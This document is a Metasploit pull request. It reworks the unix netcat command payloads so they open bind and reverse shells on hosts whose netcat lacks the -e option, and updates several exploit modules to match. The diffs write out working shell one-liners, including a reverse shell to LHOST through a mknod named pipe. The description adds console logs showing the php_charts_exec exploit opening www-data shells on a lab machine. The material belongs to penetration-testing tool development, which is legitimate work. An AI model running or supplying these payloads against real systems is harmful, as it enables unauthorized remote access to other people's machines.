### PR TITLE
traditional netcat compatible payloads

### DIFF
--- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb
+++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'DisableNops' => true,
 					'Compat'      =>
 						{
-							'RequiredCmd' => 'generic netcat-e'
+							'RequiredCmd' => 'generic netcat'
 						}
 				},
 			'Targets'        =>

--- a/modules/exploits/linux/http/wanem_exec.rb
+++ b/modules/exploits/linux/http/wanem_exec.rb
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic netcat-e',
+							'RequiredCmd' => 'generic netcat',
 						}
 				},
 			'DefaultOptions' =>

--- a/modules/exploits/linux/http/zen_load_balancer_exec.rb
+++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic netcat-e perl bash',
+							'RequiredCmd' => 'generic netcat perl bash',
 						}
 				},
 			'Targets'        =>

--- a/modules/exploits/unix/http/ctek_skyrouter.rb
+++ b/modules/exploits/unix/http/ctek_skyrouter.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic perl telnet netcat-e bash',
+							'RequiredCmd' => 'generic perl telnet netcat bash',
 						}
 				},
 			'Platform'       => 'unix',

--- a/modules/exploits/unix/webapp/generic_exec.rb
+++ b/modules/exploits/unix/webapp/generic_exec.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic perl telnet netcat-e bash',
+							'RequiredCmd' => 'generic perl telnet netcat bash',
 						}
 				},
 			'Platform'       => 'unix',

--- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
+++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic perl bash telnet netcat-e',
+							'RequiredCmd' => 'generic perl bash telnet netcat',
 						}
 				},
 			'Platform'       => 'unix',

--- a/modules/exploits/unix/webapp/hastymail_exec.rb
+++ b/modules/exploits/unix/webapp/hastymail_exec.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic perl ruby python netcat-e',
+							'RequiredCmd' => 'generic perl ruby python netcat',
 						}
 				},
 			'Platform'       => ['unix'],

--- a/modules/exploits/unix/webapp/narcissus_backend_exec.rb
+++ b/modules/exploits/unix/webapp/narcissus_backend_exec.rb
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Compat'         =>
 				{
 					'PayloadType' => 'cmd',
-					'RequiredCmd' => 'generic perl ruby python bash netcat-e'
+					'RequiredCmd' => 'generic perl ruby python bash netcat'
 				},
 			'Targets'        =>
 				[

--- a/modules/exploits/unix/webapp/php_charts_exec.rb
+++ b/modules/exploits/unix/webapp/php_charts_exec.rb
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 						'PayloadType' => 'cmd',
-						'RequiredCmd' => 'generic telnet bash netcat-e perl ruby python',
+						'RequiredCmd' => 'generic telnet bash netcat perl ruby python',
 						}
 				},
 			'DefaultOptions'  =>

--- a/modules/payloads/singles/cmd/unix/bind_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb
@@ -17,16 +17,21 @@ module Metasploit3
 
 	def initialize(info = {})
 		super(merge_info(info,
-			'Name'          => 'Unix Command Shell, Bind TCP (via netcat -e)',
+			'Name'          => 'Unix Command Shell, Bind TCP',
 			'Description'   => 'Listen for a connection and spawn a command shell via netcat',
-			'Author'        => 'hdm',
+			'Author'        =>
+				[
+					'hdm',     # Original netcat -e payload
+					'm-1-k-3', # netcat payload
+					'egypt'    # Payloads merge
+				],
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'unix',
 			'Arch'          => ARCH_CMD,
 			'Handler'       => Msf::Handler::BindTcp,
 			'Session'       => Msf::Sessions::CommandShell,
 			'PayloadType'   => 'cmd',
-			'RequiredCmd'   => 'netcat-e',
+			'RequiredCmd'   => 'netcat',
 			'Payload'       =>
 				{
 					'Offsets' => { },
@@ -46,7 +51,10 @@ module Metasploit3
 	# Returns the command string to use for execution
 	#
 	def command_string
-		"nc -lp #{datastore['LPORT']} -e /bin/sh"
+		backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
+		command = "(nc -l -p #{datastore['LPORT']} -e /bin/sh 2>/dev/null) ||"
+		command << "(mknod /tmp/#{backpipe} p; nc -l #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe})"
+		return command
 	end
 
 end

--- a/modules/payloads/singles/cmd/unix/bind_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb
@@ -17,7 +17,7 @@ module Metasploit3
 
 	def initialize(info = {})
 		super(merge_info(info,
-			'Name'          => 'Unix Command Shell, Bind TCP',
+			'Name'          => 'Unix Command Shell, Bind TCP (via netcat)',
 			'Description'   => 'Listen for a connection and spawn a command shell via netcat',
 			'Author'        =>
 				[

--- a/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb
@@ -17,7 +17,7 @@ module Metasploit3
 
 	def initialize(info = {})
 		super(merge_info(info,
-			'Name'          => 'Unix Command Shell, Bind TCP IPv6',
+			'Name'          => 'Unix Command Shell, Bind TCP (via netcat) IPv6',
 			'Description'   => 'Listen for a connection and spawn a command shell via netcat',
 			'Author'        =>
 				[

--- a/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb
@@ -17,16 +17,21 @@ module Metasploit3
 
 	def initialize(info = {})
 		super(merge_info(info,
-			'Name'          => 'Unix Command Shell, Bind TCP (via netcat -e) IPv6',
+			'Name'          => 'Unix Command Shell, Bind TCP IPv6',
 			'Description'   => 'Listen for a connection and spawn a command shell via netcat',
-			'Author'        => 'hdm',
+			'Author'        =>
+				[
+					'hdm',     # Original netcat -e payload
+					'm-1-k-3', # netcat payload
+					'egypt'    # Payloads merge
+				],
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'unix',
 			'Arch'          => ARCH_CMD,
 			'Handler'       => Msf::Handler::BindTcp,
 			'Session'       => Msf::Sessions::CommandShell,
 			'PayloadType'   => 'cmd',
-			'RequiredCmd'   => 'netcat-e',
+			'RequiredCmd'   => 'netcat',
 			'Payload'       =>
 				{
 					'Offsets' => { },
@@ -46,7 +51,11 @@ module Metasploit3
 	# Returns the command string to use for execution
 	#
 	def command_string
-		"nc -6 -lp #{datastore['LPORT']} -e /bin/sh"
+		backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
+		command = "(nc -6 -l -p #{datastore['LPORT']} -e /bin/sh 2>/dev/null) ||"
+		command << "(mknod /tmp/#{backpipe} p; nc -6 -l #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe})"
+		return command
+
 	end
 
 end

--- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb
@@ -17,16 +17,21 @@ module Metasploit3
 
 	def initialize(info = {})
 		super(merge_info(info,
-			'Name'          => 'Unix Command Shell, Reverse TCP (via netcat -e)',
+			'Name'          => 'Unix Command Shell, Reverse TCP',
 			'Description'   => 'Creates an interactive shell via netcat',
-			'Author'        => 'hdm',
+			'Author'        =>
+				[
+					'hdm',     # Original netcat -e payload
+					'm-1-k-3', # netcat payload
+					'egypt'    # Payloads merge
+				],
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'unix',
 			'Arch'          => ARCH_CMD,
 			'Handler'       => Msf::Handler::ReverseTcp,
 			'Session'       => Msf::Sessions::CommandShell,
 			'PayloadType'   => 'cmd',
-			'RequiredCmd'   => 'netcat-e',
+			'RequiredCmd'   => 'netcat',
 			'Payload'       =>
 				{
 					'Offsets' => { },
@@ -46,7 +51,10 @@ module Metasploit3
 	# Returns the command string to use for execution
 	#
 	def command_string
-		"nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh "
+		backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
+		command = "(nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh) ||"
+		command << "(mknod /tmp/#{backpipe} p; nc #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe})"
+		return command
 	end
 
 end

--- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb
@@ -17,7 +17,7 @@ module Metasploit3
 
 	def initialize(info = {})
 		super(merge_info(info,
-			'Name'          => 'Unix Command Shell, Reverse TCP',
+			'Name'          => 'Unix Command Shell, Reverse TCP (via netcat)',
 			'Description'   => 'Creates an interactive shell via netcat',
 			'Author'        =>
 				[


### PR DESCRIPTION
This pull requests modify the current cmd netcat payloads to make them compatible with the netcat version without "-e" option.

After speaking with @jlee-r7 it seems a good idea to combine both versions in the same modules, even when there are drawbacks:
- Payload space
- More badchars to have into account

The actual modules compatibles with the netcat payloads should work still. So doing a pull request with the hope others share their opinion about the topic.

On the other hand, this pull request should allow #1496 to use the cmd netcat payloads. 

The modified cmd netcat payloads have been tested with the php-charts exploit:
- Using the netcat without -e:

```
msf > use exploit/unix/webapp/php_charts_exec 
msf  exploit(php_charts_exec) > set rhost 192.168.1.159
rhost => 192.168.1.159
msf  exploit(php_charts_exec) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf  exploit(php_charts_exec) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf  exploit(php_charts_exec) > exploit

[*] 192.168.1.159:80 - Sending payload (716 bytes)
[*] Started bind handler
[*] Command shell session 1 opened (192.168.1.128:52900 -> 192.168.1.159:4444) at 2013-02-28 20:40:28 +0100
id
id;

uname -a

[-] Exploit failed [unexpected-reply]: 192.168.1.159:80 - Sending payload failed

uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y

[*] 192.168.1.159 - Command shell session 1 closed.  Reason: User exit
msf  exploit(php_charts_exec) > set payload cmd/unix/reverse_netcat 
payload => cmd/unix/reverse_netcat
msf  exploit(php_charts_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.159:80 - Sending payload (796 bytes)
[*] Command shell session 2 opened (192.168.1.128:4444 -> 192.168.1.159:48078) at 2013-02-28 20:41:12 +0100
id

[-] Exploit failed [unexpected-reply]: 192.168.1.159:80 - Sending payload failed

uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 2? [y/N]  y

```
- After switching to netcat.traditional (Ubuntu 10.04) (netcat with -e option):

```
msf  exploit(php_charts_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.159:80 - Sending payload (732 bytes)
[*] Command shell session 3 opened (192.168.1.128:4444 -> 192.168.1.159:48080) at 2013-02-28 20:44:20 +0100
id
[-] Exploit failed [unexpected-reply]: 192.168.1.159:80 - Sending payload failed

uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 3? [y/N]  y

[*] 192.168.1.159 - Command shell session 3 closed.  Reason: User exit
msf  exploit(php_charts_exec) > set payload cmd/unix/bind_netcat 
payload => cmd/unix/bind_netcat
msf  exploit(php_charts_exec) > rexploit
[*] Reloading module...

[*] 192.168.1.159:80 - Sending payload (734 bytes)
[*] Started bind handler
[*] Command shell session 4 opened (192.168.1.128:52950 -> 192.168.1.159:4444) at 2013-02-28 20:57:50 +0100
id
[-] Exploit failed [unexpected-reply]: 192.168.1.159:80 - Sending payload failed

uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 4? [y/N]  y

[*] 192.168.1.159 - Command shell session 4 closed.  Reason: User exit

```
